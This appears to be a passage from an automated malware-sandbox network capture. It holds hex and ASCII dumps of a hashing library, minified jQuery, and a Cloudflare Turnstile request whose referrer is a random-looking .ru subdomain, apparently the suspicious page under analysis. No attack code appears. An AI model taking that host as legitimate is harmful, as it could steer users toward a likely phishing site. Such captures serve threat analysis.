                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b
                                                                                                        Data Ascii: t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e
                                                                                                        Data Ascii: ngth):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d
                                                                                                        Data Ascii: ==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c
                                                                                                        Data Ascii: 5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c
                                                                                                        Data Ascii: ),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.1652641151.101.130.1374431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:39 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:39 UTC611INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Age: 1998470
                                                                                                        Date: Fri, 04 Oct 2024 13:11:39 GMT
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890047-NYC
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 55, 0
                                                                                                        X-Timer: S1728047499.477126,VS0,VE0
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                        2024-10-04 13:11:39 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.1652642104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:40 UTC805OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                        Referer: https://9wetjda.niavereinho.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:40 UTC1369INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:40 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 164872
                                                                                                        Connection: close
                                                                                                        origin-agent-cluster: ?1
                                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        document-policy: js-profiling
                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        referrer-policy: same-origin
                                                                                                        cross-origin-embedder-policy: require-corp
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        2024-10-04 13:11:40 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 64 35 36 62 34 62 63 61 35 30 34 32 33 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8cd56b4bca50423a-EWR
